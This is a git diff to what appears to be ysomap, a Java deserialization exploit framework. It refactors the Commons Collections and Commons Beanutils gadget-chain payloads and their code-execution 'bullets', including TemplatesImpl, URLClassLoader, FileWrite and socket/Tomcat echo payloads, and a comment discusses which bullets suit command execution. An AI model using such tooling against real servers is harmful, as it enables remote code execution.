diff --git a/core/src/main/java/ysomap/bullets/collections/TransformerWithTemplatesImplBullet.java b/core/src/main/java/ysomap/bullets/collections/TransformerWithTemplatesImplBullet.java index 83fa9d5..780c4e1 100755 --- a/core/src/main/java/ysomap/bullets/collections/TransformerWithTemplatesImplBullet.java +++ b/core/src/main/java/ysomap/bullets/collections/TransformerWithTemplatesImplBullet.java @@ -10,11 +10,12 @@ /** * jdk.xml.enableTemplatesImplDeserialization=true + * 这个bullet不是很有必要 * @author wh1t3P1g * @since 2020/2/17 */ @SuppressWarnings({"rawtypes"}) -@Bullets +//@Bullets @Dependencies({"<=commons-collections 3.2.1", "<=commons-collections 4.0"}) @Details("执行后,执行任意代码,依赖TemplatesImpl") @Authors({ Authors.WH1T3P1G }) diff --git a/core/src/main/java/ysomap/bullets/jdk/TemplatesImplBullet.java b/core/src/main/java/ysomap/bullets/jdk/TemplatesImplBullet.java index 578a824..8c2e40a 100755 --- a/core/src/main/java/ysomap/bullets/jdk/TemplatesImplBullet.java +++ b/core/src/main/java/ysomap/bullets/jdk/TemplatesImplBullet.java @@ -129,6 +129,10 @@ public static class StubTransletPayload extends AbstractTranslet implements Seri private static final long serialVersionUID = -5971610431559700674L; + public StubTransletPayload(){ + transletVersion = 101; + } + public void transform (DOM document, SerializationHandler[] handlers ) throws TransletException {} @Override diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsBeanutils1.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsBeanutils1.java index 1cfa294..c98df2a 100644 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsBeanutils1.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsBeanutils1.java @@ -10,6 +10,10 @@ import java.util.PriorityQueue; /** + * cb1的反序列化会报错 + * 所以在选用bullet的时候,尽量选取报错也不会影响执行效果的类型 + * 比如直接执行命令 + * 比如运行socket shell的bullet就不太适合了 * @author wh1t3P1g * @since 2020/5/14 */ @@ -23,7 +27,12 @@ public class CommonsBeanutils1 extends AbstractPayload { @Override public Bullet getDefaultBullet(Object... args) throws Exception { - return new TemplatesImplBullet().set("body",args[0]); + Bullet bullet = new TemplatesImplBullet(); + bullet.set("type", args[0]); + bullet.set("body", args[1]); + bullet.set("effect", args[2]); + bullet.set("exception", args[3]); + return bullet; } @Override diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections1.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections1.java index 64ca19a..8223b01 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections1.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections1.java @@ -5,7 +5,7 @@ import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.map.LazyMap; import ysomap.bullets.Bullet; -import ysomap.bullets.collections.TransformerWithTemplatesImplBullet; +import ysomap.bullets.collections.TransformerBullet; import ysomap.common.annotation.*; import ysomap.core.util.PayloadHelper; import ysomap.core.util.ReflectionHelper; @@ -21,10 +21,14 @@ * @since 2020/2/17 */ @SuppressWarnings({"rawtypes","unchecked"}) -@Payloads +//@Payloads @Targets({Targets.JDK}) @Authors({ Authors.FROHOFF }) -@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false) +@Require(bullets = {"TransformerBullet", + "TransformerWithJNDIBullet", + "TransformerWithSleepBullet", + "TransformerWithURLClassLoaderBullet", + "TransformerWithFileWriteBullet"}, param = false) @Dependencies({"commons-collections:commons-collections:3.2.1","jdk7"}) public class CommonsCollections1 extends AbstractPayload { @@ -35,8 +39,7 @@ public boolean checkObject(Object obj) { @Override public Bullet getDefaultBullet(Object... args) throws Exception { - return new TransformerWithTemplatesImplBullet() - .set("args",args[0]); + return new TransformerBullet().set("args",args[0]); } @Override diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections2.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections2.java index 8eb2b7c..34bfb90 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections2.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections2.java @@ -17,7 +17,7 @@ * @since 2020/2/17 */ @SuppressWarnings({"rawtypes","unchecked"}) -@Payloads +//@Payloads @Targets({Targets.JDK}) @Authors({ Authors.FROHOFF }) @Require(bullets = {"TemplatesImplBullet"}, param = false) @@ -31,7 +31,12 @@ public boolean checkObject(Object obj) { @Override public Bullet getDefaultBullet(Object... args) throws Exception { - return new TemplatesImplBullet().set("body", args[0]); + Bullet bullet = new TemplatesImplBullet(); + bullet.set("type", args[0]); + bullet.set("body", args[1]); + bullet.set("effect", args[2]); + bullet.set("exception", args[3]); + return bullet; } @Override diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections3.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections3.java index d640da3..5b3d0bf 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections3.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections3.java @@ -20,7 +20,11 @@ @Payloads @Targets({Targets.JDK}) @Authors({ Authors.FROHOFF }) -@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false) +@Require(bullets = {"TransformerBullet", + "TransformerWithJNDIBullet", + "TransformerWithSleepBullet", + "TransformerWithURLClassLoaderBullet", + "TransformerWithFileWriteBullet"}, param = false) @Dependencies({"org.apache.commons:commons-collections4:4.0"}) public class CommonsCollections3 extends CommonsCollections2 { diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections4.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections4.java index b0ec5fc..81d6dd7 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections4.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections4.java @@ -43,10 +43,14 @@ https://github.com/JetBrains/jdk8u_jdk/commit/af2361ee2878302012214299036b3a8b4ed36974#diff-f89b1641c408b60efe29ee513b3d22ffR70 */ @SuppressWarnings({"rawtypes"}) -@Payloads +//@Payloads @Targets({Targets.JDK}) @Authors({ Authors.MATTHIASKAISER, Authors.JASINNER }) -@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false) +@Require(bullets = {"TransformerBullet", + "TransformerWithJNDIBullet", + "TransformerWithSleepBullet", + "TransformerWithURLClassLoaderBullet", + "TransformerWithFileWriteBullet"}, param = false) @Dependencies({"commons-collections:commons-collections:3.2.1, without security manager"}) public class CommonsCollections4 extends AbstractPayload { diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections5.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections5.java index 3a6f843..97ae82b 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections5.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections5.java @@ -24,7 +24,11 @@ @Payloads @Targets({Targets.JDK}) @Authors({ Authors.MATTHIASKAISER }) -@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false) +@Require(bullets = {"TransformerBullet", + "TransformerWithJNDIBullet", + "TransformerWithSleepBullet", + "TransformerWithURLClassLoaderBullet", + "TransformerWithFileWriteBullet"}, param = false) @Dependencies({"commons-collections:commons-collections:3.2.1"}) public class CommonsCollections5 extends AbstractPayload { diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections6.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections6.java index 45bd713..59281a8 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections6.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections6.java @@ -19,9 +19,13 @@ * @since 2020/2/18 */ @SuppressWarnings({"rawtypes","unchecked"}) -@Payloads +//@Payloads @Targets({Targets.JDK}) -@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false) +@Require(bullets = {"TransformerBullet", + "TransformerWithJNDIBullet", + "TransformerWithSleepBullet", + "TransformerWithURLClassLoaderBullet", + "TransformerWithFileWriteBullet"}, param = false) @Dependencies({"commons-collections:commons-collections:3.2.1"}) @Authors({Authors.SCRISTALLI, Authors.HANYRAX, Authors.EDOARDOVIGNATI}) public class CommonsCollections6 extends AbstractPayload { diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections7.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections7.java index b5da893..d011c4c 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections7.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections7.java @@ -30,7 +30,12 @@ public boolean checkObject(Object obj) { @Override public Bullet getDefaultBullet(Object... args) throws Exception { - return new TemplatesImplBullet().set("body", args[0]); + Bullet bullet = new TemplatesImplBullet(); + bullet.set("type", args[0]); + bullet.set("body", args[1]); + bullet.set("effect", args[2]); + bullet.set("exception", args[3]); + return bullet; } @Override diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections8.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections8.java index 98ea47c..8705801 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections8.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections8.java @@ -23,7 +23,11 @@ @Payloads @Targets({Targets.JDK}) @Dependencies({"commons-collections:commons-collections:3.2.1"}) -@Require(bullets = {"TransformerBullet","TransformerWithJNDIBullet","TransformerWithTemplatesImplBullet","TransformerWithResponseBullet"}, param = false) +@Require(bullets = {"TransformerBullet", + "TransformerWithJNDIBullet", + "TransformerWithSleepBullet", + "TransformerWithURLClassLoaderBullet", + "TransformerWithFileWriteBullet"}, param = false) @Authors({ Authors.WH1T3P1G }) public class CommonsCollections8 extends AbstractPayload { diff --git a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections9.java b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections9.java index 76cf04f..28aa202 100755 --- a/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections9.java +++ b/core/src/main/java/ysomap/payloads/java/collections/CommonsCollections9.java @@ -23,7 +23,7 @@ @SuppressWarnings({"rawtypes","unchecked"}) @Payloads @Targets({Targets.JDK}) -@Dependencies({"commons-collections:commons-collections:3.2.1","for shiro"}) +@Dependencies({"commons-collections:commons-collections:3.2.1","special for shiro"}) @Require(bullets = {"TemplatesImplBullet"}, param = false) @Authors({ Authors.WH1T3P1G }) public class CommonsCollections9 extends AbstractPayload { @@ -35,7 +35,12 @@ public boolean checkObject(Object obj) { @Override public Bullet getDefaultBullet(Object... args) throws Exception { - return new TemplatesImplBullet().set("body", args[0]); + Bullet bullet = new TemplatesImplBullet(); + bullet.set("type", args[0]); + bullet.set("body", args[1]); + bullet.set("effect", args[2]); + bullet.set("exception", args[3]); + return bullet; } @Override diff --git a/thirdparty/src/main/java/echo/SocketEchoPayload.java b/thirdparty/src/main/java/echo/SocketEchoPayload.java index 73630af..b9f23a9 100644 --- a/thirdparty/src/main/java/echo/SocketEchoPayload.java +++ b/thirdparty/src/main/java/echo/SocketEchoPayload.java @@ -18,11 +18,11 @@ */ public class SocketEchoPayload extends AbstractTranslet implements Serializable, Runnable { - private static String host; private static int port; public SocketEchoPayload(){ + transletVersion = 101; new Thread(this).start(); } diff --git a/thirdparty/src/main/java/echo/TomcatEchoPayload.java b/thirdparty/src/main/java/echo/TomcatEchoPayload.java index af10daf..93c154a 100644 --- a/thirdparty/src/main/java/echo/TomcatEchoPayload.java +++ b/thirdparty/src/main/java/echo/TomcatEchoPayload.java @@ -15,6 +15,7 @@ public class TomcatEchoPayload extends AbstractTranslet implements Serializable { public TomcatEchoPayload() throws Exception { + transletVersion = 101; Object o; Object resp; String s;